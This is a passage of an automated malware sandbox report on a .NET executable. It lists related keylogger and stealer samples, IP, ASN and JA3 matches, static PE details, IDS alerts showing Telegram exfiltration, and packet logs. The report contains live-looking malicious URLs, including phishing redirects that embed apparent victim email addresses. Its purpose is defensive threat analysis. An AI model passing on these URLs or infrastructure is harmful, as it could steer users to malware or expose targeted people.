                                                                                          W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                                                          • 149.154.167.220
                                                                                          eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                          • 149.154.167.220
                                                                                          checkip.dyndns.comPO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                          • 158.101.44.242
                                                                                          W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                          • 132.226.8.169
                                                                                          file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 158.101.44.242
                                                                                          PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 158.101.44.242
                                                                                          image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.130.0

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          TELEGRAMRUhttps://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.comGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=olgelfuabFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          ZT0KQ1PC.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                          • 149.154.167.99
                                                                                          RisingStrip.exeGet hashmaliciousVidarBrowse
                                                                                          • 149.154.167.99
                                                                                          https://telegra.ph/Clarkson-122025-01-02Get hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          https://telegra.ph/Clarkson-122025-01-02Get hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.99
                                                                                          image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          CLOUDFLARENETUShttps://u46509964.ct.sendgrid.net/ls/click?upn=u001.yzEgCXNOtR0g3VDqrfESrp2R1cF5ldZEX7V8PkOFzM7ruCjjHr3jp5RGL8GduYU-2BjhHflFlXWDZcLxMTl-2BOf3Q-3D-3Dypty_wgMyjr7kuwn9YAatYj1Mf4g8ovXgJAxpM0PlHYE9e6HZUYNSU5hkcVbHbQ0q5E6I3Vn1iKBKWI4PPg-2BCiKeQ2OE0mP0AQHbDintLIvkOVimerxUzun3ony9NL1yVRuA4WQuNzjMCPVhNshNaKMXqQsMtvsckMLkqRAU-2FNXREyY4h03-2BUaA2tGQGT4QuateFiuKuJahSkLVnvCQKkIZcpO3aNqWzyxlmipL9FIlHPuq9M09y6kh5iIlWeVT6v9HaNCeK7mNRfTM-2FaE-2FYlUjqPiHlgW1bQDf4vc-2B8bTW2XnnwQ3OD-2BHpj1pVnq8E-2B5KWyk-2BdpGzJAivJFYRAm0bkM-2FBffGjfgcs9NuM6kyERGkXLWY0YDwCJHP0W3vRM98XO8M2QRiYbYEh4a80qwygvsII8yUtWb452P35A7kazo2Bsi9HmjZL32fVK2Kj1rsDSpFE2-2FPz5MkH0YdERZv2D9LaOR2CGCCtOzFgtqISzhm5DNl8sQN1HGl9yl3sxCQ2TXG-2B2-2FQIL0ayfUBJHiJurB3Y0z5HdmkhdTnyWYqM9SpbJkxNnfJXP5NAUZTA0q1B3cuqIcfJ8Gdtm1IuXC9fLcGQFLP2A1GLVH6tFOcbPu-2F-2FO5Evswi23nrB2CFvf3EAjbRLMMYTn-2FzVKiL-2FLRKqLChrdjv6iJ364jG39-2BR-2BRXc7k2MN4PqhyBkuDYVO6KJhJtr7VWQ1JkGgezZvQKBz4Vi6Gq0ytsGLOZnihpIPww05MHzIdOzD94b48OUKOeaeHavlRK5pXSjQ7zOPyDnUSjdCJ-2FLEEq4EOGwcWXvvFjweg-2BQEsFRU1KoSIvsY-2FcQgpMyEYXStCMiKHT4WQ7TMDjBOR3rhCh2QliVs-2FI1-2BSi-2FjGbWAd30KPG-2F7b4L3CtlRajP3-2BEOcqU3Jvnbxu8AdSEg-2F0bY3U9Rsq-2FRYamf2McJIE0i0zbXhYCXRm3cXwuZg-2Fn9ed9-2FBCSIqPn-2B7Kqqgzm-2FKg-3D-3DGet hashmaliciousUnknownBrowse
                                                                                          • 1.1.1.1
                                                                                          https://u46509964.ct.sendgrid.net/ls/click?upn=u001.yzEgCXNOtR0g3VDqrfESrp2R1cF5ldZEX7V8PkOFzM7ruCjjHr3jp5RGL8GduYU-2BjhHflFlXWDZcLxMTl-2BOf3Q-3D-3Dypty_wgMyjr7kuwn9YAatYj1Mf4g8ovXgJAxpM0PlHYE9e6HZUYNSU5hkcVbHbQ0q5E6I3Vn1iKBKWI4PPg-2BCiKeQ2OE0mP0AQHbDintLIvkOVimerxUzun3ony9NL1yVRuA4WQuNzjMCPVhNshNaKMXqQsMtvsckMLkqRAU-2FNXREyY4h03-2BUaA2tGQGT4QuateFiuKuJahSkLVnvCQKkIZcpO3aNqWzyxlmipL9FIlHPuq9M09y6kh5iIlWeVT6v9HaNCeK7mNRfTM-2FaE-2FYlUjqPiHlgW1bQDf4vc-2B8bTW2XnnwQ3OD-2BHpj1pVnq8E-2B5KWyk-2BdpGzJAivJFYRAm0bkM-2FBffGjfgcs9NuM6kyERGkXLWY0YDwCJHP0W3vRM98XO8M2QRiYbYEh4a80qwygvsII8yUtWb452P35A7kazo2Bsi9HmjZL32fVK2Kj1rsDSpFE2-2FPz5MkH0YdERZv2D9LaOR2CGCCtOzFgtqISzhm5DNl8sQN1HGl9yl3sxCQ2TXG-2B2-2FQIL0ayfUBJHiJurB3Y0z5HdmkhdTnyWYqM9SpbJkxNnfJXP5NAUZTA0q1B3cuqIcfJ8Gdtm1IuXC9fLcGQFLP2A1GLVH6tFOcbPu-2F-2FO5Evswi23nrB2CFvf3EAjbRLMMYTn-2FzVKiL-2FLRKqLChrdjv6iJ364jG39-2BR-2BRXc7k2MN4PqhyBkuDYVO6KJhJtr7VWQ1JkGgezZvQKBz4Vi6Gq0ytsGLOZnihpIPww05MHzIdOzD94b48OUKOeaeHavlRK5pXSjQ7zOPyDnUSjdCJ-2FLEEq4EOGwcWXvvFjweg-2BQEsFRU1KoSIvsY-2FcQgpMyEYXStCMiKHT4WQ7TMDjBOR3rhCh2QliVs-2FI1-2BSi-2FjGbWAd30KPG-2F7b4L3CtlRajP3-2BEOcqU3Jvnbxu8AdSEg-2F0bY3U9Rsq-2FRYamf2McJIE0i0zbXhYCXRm3cXwuZg-2Fn9ed9-2FBCSIqPn-2B7Kqqgzm-2FKg-3D-3DGet hashmaliciousUnknownBrowse
                                                                                          • 1.1.1.1
                                                                                          https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.comGet hashmaliciousUnknownBrowse
                                                                                          • 172.67.74.152
                                                                                          https://pdf-ezy.com/pdf-ezy.exeGet hashmaliciousUnknownBrowse
                                                                                          • 172.67.152.3
                                                                                          https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                          • 172.67.74.152
                                                                                          https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=olgelfuabFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                          • 104.26.13.205
                                                                                          2.elfGet hashmaliciousUnknownBrowse
                                                                                          • 1.2.10.122
                                                                                          Patcher_I5cxa9AN.exeGet hashmaliciousLummaCBrowse
                                                                                          • 172.67.132.7
                                                                                          drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                          • 172.67.74.152
                                                                                          UTMEMUSarmv5l.elfGet hashmaliciousUnknownBrowse
                                                                                          • 132.244.2.45
                                                                                          31.13.224.14-x86-2025-01-03T22_14_18.elfGet hashmaliciousMiraiBrowse
                                                                                          • 132.226.42.231
                                                                                          W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                          • 132.226.8.169
                                                                                          file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          DEMONS.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                          • 132.226.227.252
                                                                                          PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 132.226.8.169
                                                                                          Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 132.226.247.73
                                                                                          Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 132.226.247.73

                                                                                          JA3 Fingerprints

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          54328bd36c14bd82ddaa0c04b25ed9adPO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                          • 188.114.97.3
                                                                                          adguardInstaller.exeGet hashmaliciousPureLog StealerBrowse
                                                                                          • 188.114.97.3
                                                                                          W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                          • 188.114.97.3
                                                                                          file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 188.114.97.3
                                                                                          image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          3b5074b1b5d032e5620f69f9f700ff0eny9LDJr6pA.exeGet hashmaliciousQuasarBrowse
                                                                                          • 149.154.167.220
                                                                                          jaTDEkWCbs.exeGet hashmaliciousQuasarBrowse
                                                                                          • 149.154.167.220
                                                                                          3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                          • 149.154.167.220
                                                                                          elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                                                                          • 149.154.167.220
                                                                                          c2.htaGet hashmaliciousRemcosBrowse
                                                                                          • 149.154.167.220

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kP8EgMorTr.exe.log

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1216
                                                                                          Entropy (8bit):5.34331486778365
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                          Malicious:true
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):7.715274036238211
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                          File name:kP8EgMorTr.exe
                                                                                          File size:781'312 bytes
                                                                                          MD5:8a51bda9c0cd3d8519c1156dfa39426b
                                                                                          SHA1:bf1e7be7d44cf1f7499ee43d35aad3d9f8684b28
                                                                                          SHA256:6889d04a51c7a76b2ab1b4161b2b5e5d17dc2780e29dcc78b41460f982986786
                                                                                          SHA512:9b36b94da635cce4383993160b730bb32bfff0906d6c1f80c33ffab0294bba7714107f69a5fcbfdb424a2eaa0c5cd118f73c7f2611f26fbc7c75bca22f369084
                                                                                          SSDEEP:12288:fnM1cUoV+I4MVKWuLLFB5X/40NCrOtMPDREd1DfhI1RH4JBqMoEEF5LZ4HrYNrbC:fnMuRg7LSQQOCPdEd1GnH43qWEF5O0lO
                                                                                          TLSH:A1F4F1593368EA06C19647F55470E3F8077A9E8EA911E3038FFEBDEB39387016914297
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0{g..............0.................. ........@.. .......................@............@................................

                                                                                          File Icon

                                                                                          Icon Hash:a3655757150102e0

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x4bf3ba
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x677B30F3 [Mon Jan 6 01:25:07 2025 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          jmp dword ptr [00402000h]
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xbf3680x4f.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc00000x1334.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xc20000xc.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x20000xbd3c00xbd4007918c343e2d0b2e9e079c97eb3bdde78False0.900661534015852data7.7229254201155815IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0xc00000x13340x14000467f8d148a0ab7fe1013c85a7edda8aFalse0.74296875data6.703983528880647IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0xc20000xc0x2001001bc2b5a91ab3b37728ed8ad81db81False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_ICON0xc00c80xf07PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8736677930855212
                                                                                          RT_GROUP_ICON0xc0fe00x14data1.05
                                                                                          RT_VERSION0xc10040x32cdata0.42857142857142855

                                                                                          Imports

                                                                                          DLLImport
                                                                                          mscoree.dll_CorExeMain

                                                                                          Network Behavior

                                                                                          Suricata IDS Alerts

                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2025-01-06T07:41:07.750465+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749701132.226.8.16980TCP
                                                                                          2025-01-06T07:41:10.813013+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749701132.226.8.16980TCP
                                                                                          2025-01-06T07:41:11.372807+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749706188.114.97.3443TCP
                                                                                          2025-01-06T07:41:14.219249+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749707132.226.8.16980TCP
                                                                                          2025-01-06T07:41:15.625492+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749709132.226.8.16980TCP
                                                                                          2025-01-06T07:41:19.984901+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749717132.226.8.16980TCP
                                                                                          2025-01-06T07:41:20.969278+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749741132.226.8.16980TCP
                                                                                          2025-01-06T07:41:22.422409+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749753132.226.8.16980TCP
                                                                                          2025-01-06T07:41:25.823569+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749784188.114.97.3443TCP
                                                                                          2025-01-06T07:41:26.698067+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.749790149.154.167.220443TCP

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jan 6, 2025 07:41:05.574950933 CET4970180192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:05.579845905 CET8049701132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:05.579914093 CET4970180192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:05.580152988 CET4970180192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:05.584935904 CET8049701132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:07.447810888 CET8049701132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:07.453089952 CET4970180192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:07.457896948 CET8049701132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:07.703239918 CET8049701132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:07.750464916 CET4970180192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:07.751964092 CET49703443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:07.752012014 CET44349703188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:07.752116919 CET49703443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:07.758474112 CET49703443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:07.758491993 CET44349703188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:08.248347044 CET44349703188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:08.248421907 CET49703443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:08.310482979 CET49703443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:08.310512066 CET44349703188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:08.310950994 CET44349703188.114.97.3192.168.2.7
